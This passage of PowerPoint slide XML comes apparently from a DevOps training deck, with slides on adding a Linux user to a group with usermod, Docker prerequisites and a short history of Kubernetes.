              <a:rPr lang="en" sz="2600">
                <a:solidFill>
                  <a:srgbClr val="6AA84F"/>
                </a:solidFill>
              </a:rPr>
              <a:t>bcdservices</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="2600">
                <a:solidFill>
                  <a:srgbClr val="6AA84F"/>
                </a:solidFill>
              </a:rPr>
              <a:t>_staging/index.html (6081)</a:t>
            </a:r>
            <a:endParaRPr sz="2600">
              <a:solidFill>
                <a:srgbClr val="6AA84F"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="2600">
                <a:solidFill>
                  <a:srgbClr val="6AA84F"/>
                </a:solidFill>
              </a:rPr>
              <a:t>    Phpmyadmin (6079)  pma</a:t>
            </a:r>
            <a:endParaRPr sz="2600">
              <a:solidFill>
                <a:srgbClr val="6AA84F"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="1371600" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="1200"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr sz="2600">
              <a:solidFill>
                <a:srgbClr val="6AA84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103"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="256975" y="5483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720">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>How to add a user to a linux</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="3720">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="3720">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> group?</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="3720">
              <a:solidFill>
                <a:schemeClr val="accent1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="567" name="Google Shape;567;p103"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="219875" y="1570600"/>
            <a:ext cx="8435700" cy="3429000"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="ctr" bIns="91425" lIns="91425" spcFirstLastPara="1" rIns="91425" wrap="square" tIns="91425">
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="101600" marR="101600" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="2600">
                <a:solidFill>
                  <a:schemeClr val="accent3"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Syntax</a:t>
            </a:r>
            <a:endParaRPr sz="2600">
              <a:solidFill>
                <a:schemeClr val="accent3"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="355600" lvl="0" marL="101600" marR="101600" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="800"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="2600">
                <a:solidFill>
                  <a:srgbClr val="6AA84F"/>
                </a:solidFill>
              </a:rPr>
              <a:t>sudo   usermod -</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="2600">
                <a:solidFill>
                  <a:srgbClr val="6AA84F"/>
                </a:solidFill>
              </a:rPr>
              <a:t>a</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="2600">
                <a:solidFill>
                  <a:srgbClr val="6AA84F"/>
                </a:solidFill>
              </a:rPr>
              <a:t>   -G  &lt;groupName&gt; &lt;userName&gt;</a:t>
            </a:r>
            <a:endParaRPr sz="2600">
              <a:solidFill>
                <a:srgbClr val="6AA84F"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="101600" marR="101600" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="800"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr sz="2600">
              <a:solidFill>
                <a:srgbClr val="6AA84F"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="101600" marR="101600" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="800"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="2600">
                <a:solidFill>
                  <a:schemeClr val="accent5"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Example</a:t>
            </a:r>
            <a:endParaRPr sz="2600">
              <a:solidFill>
                <a:schemeClr val="accent5"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="101600" marR="101600" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="800"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="2600">
                <a:solidFill>
                  <a:srgbClr val="6AA84F"/>
                </a:solidFill>
              </a:rPr>
              <a:t>	sudo  usermod  -a  -G  oklabs  ranu</a:t>
            </a:r>
            <a:endParaRPr sz="2600">
              <a:solidFill>
                <a:srgbClr val="6AA84F"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="101600" marR="101600" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="800"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="800"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="2600">
                <a:solidFill>
                  <a:srgbClr val="6AA84F"/>
                </a:solidFill>
              </a:rPr>
              <a:t>	</a:t>
            </a:r>
            <a:endParaRPr sz="2600">
              <a:solidFill>
                <a:srgbClr val="6AA84F"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
</p:sld>
</file>

<file path=ppt/slides/slide7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1" name="Shape 5011"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5012" name="Google Shape;5012;p814">
            <a:hlinkClick r:id="rId3"/>
          </p:cNvPr>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="217650" y="369875"/>
            <a:ext cx="8839197" cy="4495363"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
    </p:spTree>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
</p:sld>
</file>

<file path=ppt/slides/slide7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6" name="Shape 5016"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5017" name="Google Shape;5017;p81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chemeClr val="accent1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Prerequisites</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="3600">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:endParaRPr b="1" sz="3600">
              <a:solidFill>
                <a:schemeClr val="accent1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5018" name="Google Shape;5018;p815"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="420450" y="1119850"/>
            <a:ext cx="8520600" cy="3416400"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="t" bIns="91425" lIns="91425" spcFirstLastPara="1" rIns="91425" wrap="square" tIns="91425">
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="-495300" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="4200"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="4200"/>
              <a:t>Docker</a:t>
            </a:r>
            <a:endParaRPr sz="4200"/>
          </a:p>
          <a:p>
            <a:pPr indent="-495300" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="4200"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="4200"/>
              <a:t>Docker Compose</a:t>
            </a:r>
            <a:endParaRPr sz="4200"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
</p:sld>
</file>

<file path=ppt/slides/slide7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2" name="Shape 5022"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5023" name="Google Shape;5023;p816"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="311700" y="18928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chemeClr val="accent1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Kubernetes</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="4400">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> History</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="4400">
              <a:solidFill>
                <a:schemeClr val="accent1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
</p:sld>
</file>

<file path=ppt/slides/slide7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7" name="Shape 5027"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5028" name="Google Shape;5028;p817"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="420450" y="254450"/>
            <a:ext cx="8520600" cy="42819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523"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en" sz="1022">
                <a:solidFill>
                  <a:srgbClr val="6AA84F"/>
                </a:solidFill>
              </a:rPr>
              <a:t>1. Origins and Initial Development (2014)</a:t>
            </a:r>
            <a:br>
              <a:rPr b="1" lang="en" sz="1022">
                <a:solidFill>
                  <a:srgbClr val="6AA84F"/>
                </a:solidFill>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en" sz="1022">
                <a:solidFill>
                  <a:srgbClr val="6AA84F"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Kubernetes, often abbreviated as K8s, was initially developed by Google. It is rooted in Google's internal cluster management system called </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1022">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Borg</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1022">
                <a:solidFill>
                  <a:srgbClr val="6AA84F"/>
                </a:solidFill>
              </a:rPr>
              <a:t>, which was used to manage massive workloads across their data centers. Kubernetes was born as an open-source project to bring the lessons learned from Borg to the broader software community. The project was announced publicly in </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1022">
                <a:solidFill>
                  <a:srgbClr val="6AA84F"/>
                </a:solidFill>
              </a:rPr>
              <a:t>June 2014</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1022">
                <a:solidFill>
                  <a:srgbClr val="6AA84F"/>
                </a:solidFill>
              </a:rPr>
              <a:t> at DockerCon by Google engineers.</a:t>
            </a:r>
            <a:endParaRPr sz="1022">
              <a:solidFill>
                <a:srgbClr val="6AA84F"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="95000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="523"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en" sz="1022">
                <a:solidFill>
                  <a:srgbClr val="6AA84F"/>
                </a:solidFill>
              </a:rPr>
              <a:t>2. Open-Sourcing and CNCF (2015)</a:t>
            </a:r>
            <a:br>
              <a:rPr b="1" lang="en" sz="1022">
                <a:solidFill>
                  <a:srgbClr val="6AA84F"/>
                </a:solidFill>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en" sz="1022">
                <a:solidFill>
                  <a:srgbClr val="6AA84F"/>
                </a:solidFill>
              </a:rPr>
              <a:t>In </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1022">
                <a:solidFill>
                  <a:srgbClr val="6AA84F"/>
                </a:solidFill>
              </a:rPr>
              <a:t>July 2015</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1022">
                <a:solidFill>
                  <a:srgbClr val="6AA84F"/>
                </a:solidFill>
              </a:rPr>
              <a:t>, Kubernetes 1.0 was officially released, marking its first stable version. At the same time, Google, along with other companies, contributed Kubernetes to the newly formed </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1022">
                <a:solidFill>
                  <a:srgbClr val="6AA84F"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Cloud Native Computing Foundation (CNCF)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1022">
                <a:solidFill>
                  <a:srgbClr val="6AA84F"/>
                </a:solidFill>
              </a:rPr>
              <a:t>, a part of the Linux Foundation. This ensured that Kubernetes would be governed by a neutral body, promoting its growth in the broader open-source ecosystem.</a:t>
            </a:r>
            <a:endParaRPr sz="1022">
              <a:solidFill>
                <a:srgbClr val="6AA84F"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="95000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="523"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en" sz="1022">
                <a:solidFill>
                  <a:srgbClr val="6AA84F"/>
                </a:solidFill>
              </a:rPr>
              <a:t>3. Rapid Growth and Adoption (2016-2017)</a:t>
            </a:r>
            <a:br>
              <a:rPr b="1" lang="en" sz="1022">
                <a:solidFill>
                  <a:srgbClr val="6AA84F"/>
                </a:solidFill>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en" sz="1022">
                <a:solidFill>
                  <a:srgbClr val="6AA84F"/>
                </a:solidFill>
              </a:rPr>
              <a:t>During this period, Kubernetes rapidly gained popularity due to its robust container orchestration capabilities. Major cloud providers like </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1022">
                <a:solidFill>
                  <a:srgbClr val="6AA84F"/>
                </a:solidFill>
              </a:rPr>
              <a:t>AWS, Azure</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1022">
                <a:solidFill>
                  <a:srgbClr val="6AA84F"/>
                </a:solidFill>
              </a:rPr>
              <a:t>, and </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1022">
                <a:solidFill>
                  <a:srgbClr val="6AA84F"/>
                </a:solidFill>
              </a:rPr>
              <a:t>IBM Cloud</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1022">
                <a:solidFill>
                  <a:srgbClr val="6AA84F"/>
                </a:solidFill>
              </a:rPr>
              <a:t> began offering Kubernetes services. Google rebranded its service as </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1022">
                <a:solidFill>
                  <a:srgbClr val="6AA84F"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Google Kubernetes Engine (GKE)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1022">
                <a:solidFill>
                  <a:srgbClr val="6AA84F"/>
                </a:solidFill>
              </a:rPr>
              <a:t>.</a:t>
            </a:r>
            <a:endParaRPr sz="1022">
              <a:solidFill>
                <a:srgbClr val="6AA84F"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="-293528" lvl="0" marL="457200" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="95000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="6AA84F"/>
              </a:buClr>
              <a:buSzPts val="1023"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1022">
                <a:solidFill>
                  <a:srgbClr val="6AA84F"/>
                </a:solidFill>
              </a:rPr>
              <a:t>The community grew quickly, with large companies such as </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1022">
                <a:solidFill>
                  <a:srgbClr val="6AA84F"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Red Hat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1022">
                <a:solidFill>
                  <a:srgbClr val="6AA84F"/>
                </a:solidFill>
              </a:rPr>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1022">
                <a:solidFill>
                  <a:srgbClr val="6AA84F"/>
                </a:solidFill>
              </a:rPr>
              <a:t>VMware</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1022">
                <a:solidFill>
                  <a:srgbClr val="6AA84F"/>
                </a:solidFill>
              </a:rPr>
              <a:t>, and </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1022">
                <a:solidFill>
                  <a:srgbClr val="6AA84F"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Microsoft</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1022">
                <a:solidFill>
                  <a:srgbClr val="6AA84F"/>
                </a:solidFill>
              </a:rPr>
              <a:t> contributing.</a:t>
            </a:r>
            <a:endParaRPr sz="1022">
              <a:solidFill>
                <a:srgbClr val="6AA84F"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="-293528" lvl="0" marL="457200" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="95000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="6AA84F"/>
              </a:buClr>
              <a:buSzPts val="1023"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1022">
                <a:solidFill>
                  <a:srgbClr val="6AA84F"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Kubernetes' flexibility and scalability made it a cornerstone of the cloud-native movement.</a:t>
            </a:r>
            <a:endParaRPr sz="1022">
              <a:solidFill>
                <a:srgbClr val="6AA84F"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="95000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="523"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en" sz="1022">
                <a:solidFill>
                  <a:srgbClr val="6AA84F"/>
                </a:solidFill>
              </a:rPr>
              <a:t>4. Dominance in the Container Orchestration Space (2018-2019)</a:t>
            </a:r>
            <a:br>
              <a:rPr b="1" lang="en" sz="1022">
                <a:solidFill>
                  <a:srgbClr val="6AA84F"/>
                </a:solidFill>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en" sz="1022">
                <a:solidFill>
                  <a:srgbClr val="6AA84F"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Kubernetes became the de facto standard for container orchestration, overshadowing competitors like </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1022">
                <a:solidFill>
                  <a:srgbClr val="6AA84F"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Docker Swarm</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1022">
                <a:solidFill>
                  <a:srgbClr val="6AA84F"/>
                </a:solidFill>
              </a:rPr>
              <a:t> and </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1022">
                <a:solidFill>
                  <a:srgbClr val="6AA84F"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Apache Mesos</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1022">
                <a:solidFill>
                  <a:srgbClr val="6AA84F"/>
                </a:solidFill>
              </a:rPr>
              <a:t>. The ecosystem evolved with tools such as </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1022">
                <a:solidFill>
                  <a:srgbClr val="6AA84F"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Helm</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1022">
                <a:solidFill>
                  <a:srgbClr val="6AA84F"/>
                </a:solidFill>
              </a:rPr>
              <a:t> (package management), </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1022">
                <a:solidFill>
                  <a:srgbClr val="6AA84F"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Prometheus</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1022">
                <a:solidFill>
                  <a:srgbClr val="6AA84F"/>
                </a:solidFill>
              </a:rPr>
              <a:t> (monitoring), and </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1022">
                <a:solidFill>
                  <a:srgbClr val="6AA84F"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Istio</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1022">
                <a:solidFill>
                  <a:srgbClr val="6AA84F"/>
                </a:solidFill>
              </a:rPr>
              <a:t> (service mesh), enhancing the Kubernetes ecosystem.</a:t>
            </a:r>
            <a:endParaRPr sz="1022">
              <a:solidFill>
                <a:srgbClr val="6AA84F"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="95000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="523"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en" sz="1022">
                <a:solidFill>
                  <a:srgbClr val="6AA84F"/>
                </a:solidFill>
              </a:rPr>
              <a:t>5. Maturity and Expansion (2020-Present)</a:t>
            </a:r>
            <a:br>
              <a:rPr b="1" lang="en" sz="1022">
                <a:solidFill>
                  <a:srgbClr val="6AA84F"/>
                </a:solidFill>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en" sz="1022">
                <a:solidFill>
                  <a:srgbClr val="6AA84F"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Kubernetes matured with major releases focusing on security, scalability, and feature enhancements. By this period:</a:t>
            </a:r>
            <a:endParaRPr sz="1022">
              <a:solidFill>
                <a:srgbClr val="6AA84F"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="-293528" lvl="0" marL="457200" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="95000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="6AA84F"/>
              </a:buClr>
              <a:buSzPts val="1023"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1022">
                <a:solidFill>
                  <a:srgbClr val="6AA84F"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Enterprises widely adopted Kubernetes for both on-premises and cloud environments.</a:t>
            </a:r>
            <a:endParaRPr sz="1022">
              <a:solidFill>
                <a:srgbClr val="6AA84F"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="-293528" lvl="0" marL="457200" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="95000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="6AA84F"/>
              </a:buClr>
              <a:buSzPts val="1023"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1022">
                <a:solidFill>
                  <a:srgbClr val="6AA84F"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Kubernetes extended its reach with projects like </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1022">
                <a:solidFill>
                  <a:srgbClr val="6AA84F"/>
                </a:solidFill>
              </a:rPr>
              <a:t>K3s</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1022">
                <a:solidFill>
                  <a:srgbClr val="6AA84F"/>
                </a:solidFill>
              </a:rPr>
              <a:t> (a lightweight Kubernetes for edge computing) and </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1022">
                <a:solidFill>
                  <a:srgbClr val="6AA84F"/>
                </a:solidFill>
              </a:rPr>
              <a:t>OpenShift</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1022">
                <a:solidFill>
                  <a:srgbClr val="6AA84F"/>
                </a:solidFill>
              </a:rPr>
